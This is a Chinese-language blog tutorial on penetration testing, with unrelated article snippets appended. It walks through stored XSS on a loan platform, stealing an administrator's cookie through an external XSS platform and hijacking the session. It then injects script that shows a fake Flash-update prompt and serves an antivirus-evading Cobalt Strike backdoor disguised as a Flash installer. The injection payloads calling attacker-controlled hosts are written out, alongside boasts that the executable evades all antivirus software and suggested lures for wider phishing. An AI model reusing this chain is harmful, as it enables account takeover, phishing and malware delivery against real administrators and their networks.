news 2026/4/16 19:50:18

【网络安全】渗透测试零基础入门之XSS攻击获取用户cookie和用户密码(实战演示)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【网络安全】渗透测试零基础入门之XSS攻击获取用户cookie和用户密码(实战演示)

前言

这是我给粉丝盆友们整理的网络安全渗透测试入门阶段XSS攻击教程。

本阶段主要讲解XSS攻击获取用户cookie和用户密码。

喜欢的朋友们,记得给我点赞支持和收藏一下,关注我,学习黑客技术。

简介

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

一、前言

网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!

网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码等,还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。

这篇主要演示如何利用XSS植入钓鱼,获得管理员内部电脑权限!

二、环境介绍

黑客(攻击者):

IP:192.168.1.9

系统:kali.2020.4

kali上作为cs的服务端!

VPS服务器:thinkphp平台地址:http://test1.dayuixiyou.cn/

钓鱼地址:http://flash.dayuixiyou.cn

办公电脑:系统:windwos7

双网卡:192.168.175.153 和 10.10.1.5

目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门页面钓鱼,通过渗透发现thinkphp贷款平台页面存在XSS漏洞利用,通过插入XSS-js代码,植入链接,最终黑客控制管理员办公电脑的过程!!

三、XSS演示

此次演示贷款thinkphp平台在公网服务器上!

1、注册账号密码

进入个人中心!

注册用户名密码!

登录用户名密码后,普通用户界面!点击设置!

输入结算信息,测试下!

2、存在XSS漏洞

输入:

<script>alert(1)</script>

测试结果修改成功!查看下前端…

查看源代码-编辑后查看到没变动,XSS代码还是存在…说明存在XSS攻击

3、注册XSS平台

https://xss.pt/xss.php?do=login

进入XSS利用平台,google也有很多别的平台!! 随意注册一个账号!

创建一个新的项目,随意填写!

选择Keepsession保持会话! 下一步!

会弹出需要执行的XSS利用代码…选择标准代码测试!

</tExtArEa>'"><sCRiPt sRC=https://xss.pt..aJ></sCrIpT>

4、利用XSS漏洞

</tExtArEa>'"><sCRiPt sRC=https://xss.pt/..aJ></sCrIpT>

这一段就是payload!将XSS连接信息返回到https://xss.pt平台上!

提交信息后,可看到网络net中XSS执行成功了…

执行成功,那么XSS平台就收到了信息,可看到!

5、获取管理员cookie

点击提现…

申请结算,成功后,会将XSS执行代码转发到后台结算该模块中!

当后台管理员访问管理界面,给客户结算资金的时候,点击提现申请模块!就会执行XSS植入的代码!!

这时候,就返回了管理员的cookie和URL信息!

6、cookie登录后台

目录扫描获得管理后台登录页面,通过Burp suite转包拦截后!

将XSS平台获取XSS漏洞植入代码返回的包中,修改其中的url和cookie信息!

send执行后,通过cookie进入到了管理员后台!

复制URL!

浏览器中访问后,正常进入管理员后台!

四、利用XSS钓鱼

1、搭建Flash钓鱼页面

在公网服务器搭建钓鱼页面,任何能访问互联网客户都可以访问该页面!

2、生成免杀后门

利用Cobal Strike生成C#语言的shell…

利用该shell进行混淆,并利用python的tinyaes模块混淆也行,在来个分离免杀,最后利用pyinstaller生成exe外壳…必过全国杀毒软件!(不演示过程)

将flash修改名字为:flashplayer_install_cn.exe(或者修改为update等吸引人下载的名称都行)

3、修改Flash源码

这是Flash贷款平台源码文件目录!!

修改index.html代码,找到其中href="进行修改为:flashplayer_install_cn.exe
意思就是点击页面立即下载就能自动下载目录下的exe后门文件!

在准备个js文件,意思是执行该js后,会在页面提示:

您的 FLASH 版本过低,尝试升级后访问该页面!

并访问到该页面:http://flash.dayuixiyou.cn/

将exe和js都上传到功能网服务器apache底层!
测试访问可看到正常读取,确保内网管理员能执行XSS后访问到js文件,这里就可以开始了!

4、利用XSS漏洞植入JS

可看到利用(三)中XSS利用的方法,执行插入:

><sCRiPtsRC=//flash.dayuixiyou.cn/flash-test.js></sCrIpT><

#需要前后加入闭合 “> <”

当"立即提交" 后直接执行了XSS植入的js文件,并提示了js中的内容!!

然后点确定后,直接跳转到flash页面!

和(三)中的方法一样,需要在后台管理页面也执行XSS,需要结算金额,让管理员去结算的时候点击执行XSS!

5、执行XSS下载flash

可看到内网管理员上班期间,登录到管理后台,登录管理员用户后,工作职责需要给客户结算金额,点击了提现申请,一般客户安全意识极差!!

点击完成后,出现了`您的 FLASH 版本过低,尝试升级后访问该页面!`,一般情况下都会点击确认!

确认后跳转到flash页面,逼真的页面!!点击立即下载!!
这里有个20.1MB的大小信息,这里简单在html修改下数字和EXE内容大小即可!

可看到下载了该后门,这里图标我没修改,google或者百度利用Folder Changer修改成flash安装包的图标更逼真!!
这里的exe是全免杀的,杀毒软件都无法放行!!

6、成功XSS钓鱼

执行安装!

成功在kali攻击机上的CS上线,可看到获取到了管理员电脑的权限!!

五、总结

这里通过渗透中,找到了某平台的XSS漏洞,利用XSS漏洞植入代码执行,诱骗到了对方客服或者管理员的内网电脑权限!

其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免杀、CS4等等知识才可搭建!

那么很多人都说flash都是经典的钓鱼漏洞了,全国警惕性都会高很多,那么我还是老话,提供的是思路,如果是一个破解软件,一个购买网站,一个利用虚荣心或者是贪小便宜的购物页面,等等进行钓鱼,进行各类的植入的话,那有多少人会中招?

希望大家提高安全意识,没有网络安全就没有国家安全!

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取


版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 8:53:21

28、Kubernetes多集群与集群联邦使用指南

Kubernetes多集群与集群联邦使用指南 1. 集群加入与移除操作 在Kubernetes集群联邦中,加入集群时可能会遇到上下文名称不符合RFC 1035标签命名规则的问题。此时,可以指定符合规则的集群名称,并使用 --cluster-context 标志指定集群上下文。例如,若要加入上下文为 clus…

作者头像 李华
网站建设 2026/4/16 15:26:30

LCD字模工具终极指南:3款神器深度对比与实战教程

你遇到的LCD显示难题&#xff0c;我们来解决 【免费下载链接】三种取字模软件介绍 本开源项目提供三种高效实用的取字模软件&#xff1a;Img2Lcd、PCtoLCD2002和字模提取V2.2。这些工具专为液晶显示屏开发设计&#xff0c;能够将图像或字符转换为适合LCD显示的格式。Img2Lcd支持…

作者头像 李华
网站建设 2026/4/16 15:24:58

从零到精通:5步快速掌握Lean数学库mathlib的完整指南

从零到精通&#xff1a;5步快速掌握Lean数学库mathlib的完整指南 【免费下载链接】mathlib Lean 3s obsolete mathematical components library: please use mathlib4 项目地址: https://gitcode.com/gh_mirrors/ma/mathlib 在当今形式化数学的浪潮中&#xff0c;mathli…

作者头像 李华
网站建设 2026/4/16 17:26:43

30、深入探索Kubernetes的定制化:API、插件与服务集成

深入探索Kubernetes的定制化:API、插件与服务集成 1. 自定义资源的管理与操作 在Kubernetes中,我们可以创建新的API端点来管理自定义资源。例如,对于名为 candies 的资源,其API端点为: /apis/awesome.corp.com/v1/namespaces/<namespace>/candies/我们可以使用…

作者头像 李华
网站建设 2026/4/16 17:52:02

32、Kubernetes包管理器Helm的使用与管理

Kubernetes包管理器Helm的使用与管理 1. 检查安装状态 Helm在安装时不会等待安装完成,因为这可能需要一些时间。可以使用 helm status 命令来查看发布的最新信息,其输出格式与初始 helm install 命令的输出相同。 例如,在安装命令的输出中,可能会看到 PersistentVo…

作者头像 李华
网站建设 2026/4/16 15:45:40

Hvigor 构建自动化部署脚本(二) 自定义Hvigor任务

自定义任务介绍 创建一个自定义任务工程&#xff0c;并且实现一个基础的任务流程 将自定义任务注册到harmony工程中的module中并执行 1、创建自定义任务工程 安装相应的nodejs与npm&#xff08;可以用安装环境后默认自带的node环境&#xff09;安装typescript环境&#xff0…

作者头像 李华